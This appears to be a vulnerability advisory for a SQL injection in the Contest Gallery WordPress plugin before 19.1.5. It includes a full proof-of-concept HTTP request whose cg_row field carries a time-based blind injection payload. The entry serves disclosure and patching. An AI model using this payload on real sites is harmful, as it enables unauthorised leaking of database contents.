WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5 - Author+ SQL Injection

Description

The plugins do not escape the cg_row POST parameter before concatenating it to an SQL query in 3_row-order.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------86534124218129715781120948050
Content-Length: 2038
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668392508; wp-settings-5=libraryContent%3Dupload
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cgGalleryHash"

355b5e0384230f74e41bc47f47d94aef
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_id"

1
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_row[1]"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_start"


-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_step"

10
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_order"

custom
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_search"


-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_email[1]"

df@kc.org
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cg_image_name[1]"

10x-featured-social-media-image-size
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="chooseAction1"

1
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------86534124218129715781120948050
Content-Disposition: form-data; name="cgIsRealFormSubmit"

true
-----------------------------86534124218129715781120948050--

Affects Plugins

Fixed in 19.1.5
Fixed in 19.1.5

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other